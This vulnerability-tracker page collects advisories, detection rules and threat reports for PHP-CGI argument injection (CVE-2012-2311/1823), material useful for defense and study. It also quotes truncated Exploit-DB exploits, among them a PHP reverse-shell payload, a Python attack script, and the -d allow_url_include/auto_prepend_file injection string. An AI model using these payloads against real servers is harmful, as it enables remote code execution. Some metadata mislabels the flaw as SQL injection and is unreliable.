CVE-2012-2311
published 2012-05-11CVE-2012-2311: sapi/cgi/cgi_main.c in PHP before 5.3.13 and 5.4.x before 5.4.3, when configured as a CGI script (aka php-cgi), does not properly handle query strings that…
PriorityP277high7.5CVSS 2.0
AVNACLAuNCPIPAP
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
68.85%
99.3th percentile
sapi/cgi/cgi_main.c in PHP before 5.3.13 and 5.4.x before 5.4.3, when configured as a CGI script (aka php-cgi), does not properly handle query strings that contain a %3D sequence but no = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-1823.
Affected
106 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php | php | <= 5.3.12 | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
Detection & IOCsextracted from sources · hover to see the quote
command-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n↗
- →Detect exploit attempts by looking for query strings containing %3D (URL-encoded '=') with no literal '=' character in the query string, combined with PHP CGI command-line flags such as -d in the URI. ↗
- →Detect HTTP requests to PHP CGI paths (e.g., /cgi-bin/php) where the query string contains URL-encoded PHP CLI flags: look for %2D%64 (decoded: -d), allow_url_include, auto_prepend_file=php://input patterns in the URI. ↗
- →Inspect HTTP response bodies for PHP error strings 'Parse error:' or 'Warning:' in response to crafted CGI query strings as a vulnerability confirmation indicator used by scanners. ↗
- →Monitor for use of Tor exit node IP addresses and dynamic DNS domains as source addresses in exploitation traffic targeting CVE-2012-2311 and CVE-2012-1823. ↗
- →Flag HTTP POST requests to PHP CGI endpoints where Content-Type is application/x-www-form-urlencoded and the body contains PHP webshell or reverse shell code (e.g., proc_open, stream_select patterns). ↗
- ·CVE-2012-2311 is specifically triggered only when PHP is deployed as a CGI script (php-cgi); PHP running as a module (mod_php) or via FastCGI is not affected by this attack vector. ↗
- ·This vulnerability is an incomplete fix for CVE-2012-1823; systems patched only for CVE-2012-1823 (PHP < 5.3.12 / 5.4.x < 5.4.2) but not updated to 5.3.13 / 5.4.3 remain exploitable via the %3D bypass. ↗
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
vendor_redhat9.8CRITICAL
vendor_ubuntu7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-9c8w-rvgj-w489: sapi/cgi/cgi_main
ghsa_unreviewed·2022-05-14·CVSS 9.8
CVE-2012-2311 [CRITICAL] CWE-89 GHSA-9c8w-rvgj-w489: sapi/cgi/cgi_main
sapi/cgi/cgi_main.c in PHP before 5.3.13 and 5.4.x before 5.4.3, when configured as a CGI script (aka php-cgi), does not properly handle query strings that contain a %3D sequence but no = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-1823.
VulnCheck
PHP PHP Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2012·CVSS 9.8
CVE-2012-2311 [CRITICAL] PHP PHP Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
PHP PHP Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
sapi/cgi/cgi_main.c in PHP before 5.3.13 and 5.4.x before 5.4.3, when configured as a CGI script (aka php-cgi), does not properly handle query strings that contain a %3D sequence but no = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-1823.
Affected: PHP PHP
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://blog.sucuri.net/2012/05/php
Ubuntu
PHP vulnerability
vendor_ubuntu·2012-05-04·CVSS 7.5
CVE-2012-1823 [HIGH] PHP vulnerability
Title: PHP vulnerability
Summary: Standalone PHP CGI scripts could be made to execute arbitrary code with
the privilege of the web server.
It was discovered that PHP, when used as a stand alone CGI processor
for the Apache Web Server, did not properly parse and filter query
strings. This could allow a remote attacker to execute arbitrary code
running with the privilege of the web server. Configurations using
mod_php5 and FastCGI were not vulnerable.
This update addresses the issue when the PHP CGI interpreter
is configured using mod_cgi and mod_actions as described in
/usr/share/doc/php5-cgi/README.Debian.gz; however, if an alternate
configuration is used to enable PHP CGI processing, it should be
reviewed to ensure that command line arguments cannot be passed to
the PHP interpreter. Pl
Red Hat
php: command line arguments injection when run in CGI mode (VU#520827)
vendor_redhat·2012-05-03·CVSS 9.8
CVE-2012-1823 [CRITICAL] php: command line arguments injection when run in CGI mode (VU#520827)
php: command line arguments injection when run in CGI mode (VU#520827)
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.
Statement: This flaw did not affect the versions of PHP in Red Hat Enterprise Linux 3 or 4. Updates were released for Red Hat Enterprise Linux 5 and 6 (RHSA-2012:0546, RHSA-2012:0547), Red Hat Enterprise Linux 5.3 Long Life (RHSA-2012:0568), Red Hat Enterprise Linux 5.6, 6.0, and 6.1 Extended Update Support (RHSA-2012:0568, RHSA-2012:0569), and Red Hat Appli
Red Hat
php: incomplete CVE-2012-1823 fix - incorrect check for =
vendor_redhat·2012-05-03·CVSS 9.8
CVE-2012-2311 [CRITICAL] php: incomplete CVE-2012-1823 fix - incorrect check for =
php: incomplete CVE-2012-1823 fix - incorrect check for =
sapi/cgi/cgi_main.c in PHP before 5.3.13 and 5.4.x before 5.4.3, when configured as a CGI script (aka php-cgi), does not properly handle query strings that contain a %3D sequence but no = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-1823.
Statement: Not vulnerable. Red Hat did not release PHP package updates addressing CVE-2012-1823 that introduce the CVE-2012-2311 issue. Therefore, this CVE does not affect any Red Hat products.
Package: php (Red Hat Enterprise Linux 4) - Not affected
Package: php (Red
Suricata
ET EXPLOIT PHP-CGI Query String Parameter Vuln Inbound (CVE-2012-2311)
suricata·2021-01-27·CVSS 7.5
CVE-2012-2311 [HIGH] ET EXPLOIT PHP-CGI Query String Parameter Vuln Inbound (CVE-2012-2311)
ET EXPLOIT PHP-CGI Query String Parameter Vuln Inbound (CVE-2012-2311)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT PHP-CGI Query String Parameter Vuln Inbound (CVE-2012-2311)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5
Exploit-DB
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner
exploitdb·2013-10-31
CVE-2012-2336 Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner
Apache + PHP array("pipe", "r"), 1 => array("pipe", "w"),2 => array("pipe", "w"));
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {exit(1);}stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");while (1) {
if (feof($sock)) {printit("ERROR: Shell connection terminated");break;}
if (feof($pipes[1])) {printit("ERROR: Shell process terminated");break;}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);}if (in_array($pipes[1], $r
Exploit-DB
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution
exploitdb·2013-10-29·CVSS 9.8
CVE-2012-2336 [CRITICAL] Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution
Apache + PHP
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
typedef struct {
int sockfd;
SSL *handle;
SSL_CTX *ctx;
} connection;
void usage(char *argv[])
{
printf("usage: %s " \
" [--force-interpreter interpreter]\n",
argv[0]);
exit(1);
}
char poststr[] = "POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F" \
"%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64" \
"+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73" \
"%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E" \
"%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63" \
"%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62" \
"%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74" \
"%%6F%%5F%
Exploit-DB
PHP < 5.3.12 / < 5.4.2 - CGI Argument Injection
exploitdb·2012-05-05
CVE-2012-2336 PHP < 5.3.12 / < 5.4.2 - CGI Argument Injection
PHP """
post_Length = len(pwn_code)
http_raw="""POST /?-dallow_url_include%%3don+-dauto_prepend_file%%3dphp://input HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded
Content-Length: %s
%s
""" %(HOST , post_Length ,pwn_code)
print http_raw
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((HOST, int(PORT)))
sock.send(http_raw)
data = sock.recv(10000)
print repr(data)
sock.close()
except socket.error, msg:
sys.stderr.write("[ERROR] %s\n" % msg[1])
sys.exit(1)
if __name__ == '__main__':
try:
HOST = sys.argv[1]
PORT = sys.argv[2]
cgi_exploit()
except IndexError:
print '[+]Usage: cgi_test.py site.com 80'
sys.exit(-1)
Exploit-DB
PHP 5.3.12/5.4.2 - CGI Argument Injection (Metasploit)
exploitdb·2012-05-04
CVE-2012-2336 PHP 5.3.12/5.4.2 - CGI Argument Injection (Metasploit)
PHP 5.3.12/5.4.2 - CGI Argument Injection (Metasploit)
---
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 'PHP CGI Argument Injection',
'Description' => %q{
When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to
an argument injection vulnerability. This module takes advantage of
the -d flag to set php.ini directives to achieve code execution.
From the advisory: "if there is NO unescaped '=' in the query string,
the string is split on '+' (encoded space) characters, urldecoded,
passed to a function that escapes shell metacharacters (th
Unit42
Network Attack Trends: Internet of Threats (August-October 2020)
blogs_unit42·2021-01-22·CVSS 9.8
CVE-2012-2311 [CRITICAL] Network Attack Trends: Internet of Threats (August-October 2020)
Threat Research Center
Trend Reports
Vulnerabilities
## Network Attack Trends: Internet of Threats (August-October 2020)
Yue Guan
Lei Xu
Ken Hsu
Zhibin Zhang
Published: January 22, 2021
Malware
Trend Reports
Vulnerabilities
DDoS
Exploits
IoT
Network security trends
## Executive Summary
Unit 42 researchers observed interesting attack trends from August-October 2020. Despite a surge in scanner activities and HTTP directory traversal exploitation attempts, CVE-2012-2311 and CVE-2012-1823 , which were the most commonly exploited vulnerabilities in the wild in early summer 2020 , are no longer at the top of that list. Several new critical exploits, including but not limited to CVE-2020-17496 and CVE-2020-25213 , have emerged and were being utilized at a constant and concern
Unit42
Network Attack Trends: Internet of Threats (August-October 2020)
blogs_unit42·2021-01-22·CVSS 9.8
CVE-2012-2311 [CRITICAL] Network Attack Trends: Internet of Threats (August-October 2020)
## Executive Summary
Unit 42 researchers observed interesting attack trends from August-October 2020. Despite a surge in scanner activities and HTTP directory traversal exploitation attempts, CVE-2012-2311 and CVE-2012-1823, which were the most commonly exploited vulnerabilities in the wild in early summer 2020, are no longer at the top of that list. Several new critical exploits, including but not limited to CVE-2020-17496 and CVE-2020-25213, have emerged and were being utilized at a constant and concerning rate as of fall 2020. To complicate matters, malicious actors are well aware that new exploits aren’t always needed to get the job done. Based on observations of malicious traffic for the designated three months, weaponized ThinkPHP vulnerabilities like CVE-2018-20062 and CVE-2019-908
Unit42
Network Attack Trends: Attackers Leveraging High Severity and Critical Exploits (May-July 2020)
blogs_unit42·2020-09-15·CVSS 9.8
CVE-2021-24074 [CRITICAL] Network Attack Trends: Attackers Leveraging High Severity and Critical Exploits (May-July 2020)
Threat Research Center
Trend Reports
Vulnerabilities
## Network Attack Trends: Attackers Leveraging High Severity and Critical Exploits (May-July 2020)
Brock Mammen
Yue Guan
Yu Fu
Published: September 15, 2020
Trend Reports
Vulnerabilities
CVE-2021-24074
CVE-2021-24086
CVE-2021-24094
Microsoft
Windows
## Executive Summary
From May 1-July 21, 2020, Unit 42 researchers captured global network traffic from firewalls around the world and then analyzed the data to examine the latest network attack trends. The majority of attacks we observed were classified as high severity (56.7%), and nearly one quarter (23%) were classified as critical. The most common vulnerabilities exploited were CVE-2012-2311 and CVE-2012-1823 , both command injection vulnerabilities in PHP CGI scripts
Unit42
Network Attack Trends: Attackers Leveraging High Severity and Critical Exploits (May-July 2020)
blogs_unit42·2020-09-15·CVSS 9.8
CVE-2012-2311 [CRITICAL] Network Attack Trends: Attackers Leveraging High Severity and Critical Exploits (May-July 2020)
## Executive Summary
From May 1-July 21, 2020, Unit 42 researchers captured global network traffic from firewalls around the world and then analyzed the data to examine the latest network attack trends. The majority of attacks we observed were classified as high severity (56.7%), and nearly one quarter (23%) were classified as critical. The most common vulnerabilities exploited were CVE-2012-2311 and CVE-2012-1823, both command injection vulnerabilities in PHP CGI scripts. This indicates that attackers are looking for exploits with high impact.
We analyzed the network attacks in terms of the countries from which they originated. Of note, China overwhelmingly had the highest activity, followed by Russia and the United States. This may be in part because of the large population that China,
CTF
readme
ctf_writeups·2020
readme
# **H@cktivityCon CTF 2020**
This is my writeup for the challenges in H@cktivityCon CTF 2020, for more writeups of this CTF you can check out [this list](https://github.com/oxy-gendotmobi/ctf.hacktivitycon.2020.writeup.reference) or [CTFtime](https://ctftime.org/event/1101/tasks/)
***
# Table of Content
* [Cryptography](#cryptography)
- [Tyrannosaurus Rex](#tyrannosaurus-rex)
- [Perfect XOR](#perfect-xor)
- [Bon Appetit](#bon-appetit)
- [A E S T H E T I C](#a-e-s-t-h-e-t-i-c)
- [OFBuscated](#ofbuscated)
* [Binary Exploitation](#binary-exploitation)
- [Pancakes](#pancakes)
* [Web](#web)
- [Ladybug](#ladybug)
- [Bite](#bite)
- [GI Joe](#gi-joe)
- [Waffle Land](#waffle-land)
- [Lightweight Contact Book](#lightweight-contact-book)
- [Template Shack](#template-shack)
***
# Cryptography
Bugzilla
CVE-2012-2311 php: incomplete CVE-2012-1823 fix - incorrect check for =
bugzilla·2012-05-04·CVSS 9.8
CVE-2012-2311 [CRITICAL] CVE-2012-2311 php: incomplete CVE-2012-1823 fix - incorrect check for =
CVE-2012-2311 php: incomplete CVE-2012-1823 fix - incorrect check for =
It was discovered that the fix that was applied in PHP versions 5.3.12 and 5.4.2 to address CVE-2012-1823 (bug #818607) was incomplete and did not resolved the problem. A remote attacker could still use this flaw to remotely execute arbitrary code on the servers using affected PHP CGI configurations.
The problem was noted in the blog post of the CVE-2012-1823 issue reporter:
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
UPDATE3: The new PHP release is buggy. You can use their workaround, but
the new releases and their patch do not fix the issue. Use our
mitigations for now.
[...]
UPDATE5: We have received word that new PHP updates with the revised fix
will be released soon. The issue that this prob
Bugzilla
CVE-2012-1823 php: command line arguments injection when run in CGI mode (VU#520827)
bugzilla·2012-05-03·CVSS 9.8
CVE-2012-1823 [CRITICAL] CVE-2012-1823 php: command line arguments injection when run in CGI mode (VU#520827)
CVE-2012-1823 php: command line arguments injection when run in CGI mode (VU#520827)
A flaw was found in the way the php-cgi executable processed command line arguments when running in CGI mode. A remote attacker could send a specially-crafted request to a PHP script that would result in the query string being parsed by php-cgi as command line options and arguments. This could lead to the disclosure of the script's source code or arbitrary code execution with the privileges of the PHP interpreter.
References:
https://bugs.php.net/bug.php?id=61910
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
http://ompldr.org/vZGxxaQ
Discussion:
PHP 5.3.12 and 5.4.2 are released to correct this:
http://www.php.net/archive/2012.php#id2012-05-03-1
They also note the mitigation/workaround
Bugzilla
CVE-2012-0394 struts2: remote execution of arbitrary commands when developer mode is used
bugzilla·2012-01-11·CVSS 6.8
CVE-2012-0394 [MEDIUM] CVE-2012-0394 struts2: remote execution of arbitrary commands when developer mode is used
CVE-2012-0394 struts2: remote execution of arbitrary commands when developer mode is used
Common Vulnerabilities and Exposures assigned an identifier CVE-2012-0394 to
the following vulnerability:
Name: CVE-2012-0394
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0394
Assigned: 20120108
Reference: http://archives.neohapsis.com/archives/bugtraq/2012-01/0031.html
Reference: http://www.exploit-db.com/exploits/18329
Reference: http://struts.apache.org/2.x/docs/s2-008.html
Reference: http://struts.apache.org/2.x/docs/version-notes-2311.html
Reference: https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt
** DISPUTED ** The DebuggingInterceptor component in Apache Struts
before 2.3.1.1, when developer mode is used, allows remote attacker
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.htmlhttp://lists.opensuse.org/opensuse-security-announce/2012-05/msg00002.htmlhttp://lists.opensuse.org/opensuse-security-announce/2012-05/msg00007.htmlhttp://lists.opensuse.org/opensuse-security-announce/2012-05/msg00011.htmlhttp://marc.info/?l=bugtraq&m=134012830914727&w=2http://secunia.com/advisories/49014http://secunia.com/advisories/49085http://support.apple.com/kb/HT5501http://www.debian.org/security/2012/dsa-2465http://www.kb.cert.org/vuls/id/520827http://www.php.net/ChangeLog-5.php#5.4.3http://www.php.net/archive/2012.php#id2012-05-08-1http://www.securitytracker.com/id?1027022https://bugs.php.net/bug.php?id=61910https://bugs.php.net/patch-display.php?bug_id=61910&patch=cgi.diff-fix-check.patch&revision=1336093719&display=1https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.htmlhttp://lists.opensuse.org/opensuse-security-announce/2012-05/msg00002.htmlhttp://lists.opensuse.org/opensuse-security-announce/2012-05/msg00007.htmlhttp://lists.opensuse.org/opensuse-security-announce/2012-05/msg00011.htmlhttp://marc.info/?l=bugtraq&m=134012830914727&w=2http://secunia.com/advisories/49014http://secunia.com/advisories/49085http://support.apple.com/kb/HT5501http://www.debian.org/security/2012/dsa-2465http://www.kb.cert.org/vuls/id/520827http://www.php.net/ChangeLog-5.php#5.4.3http://www.php.net/archive/2012.php#id2012-05-08-1http://www.securitytracker.com/id?1027022https://bugs.php.net/bug.php?id=61910https://bugs.php.net/patch-display.php?bug_id=61910&patch=cgi.diff-fix-check.patch&revision=1336093719&display=1https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862
2012-05-11
Published
Exploited in the wild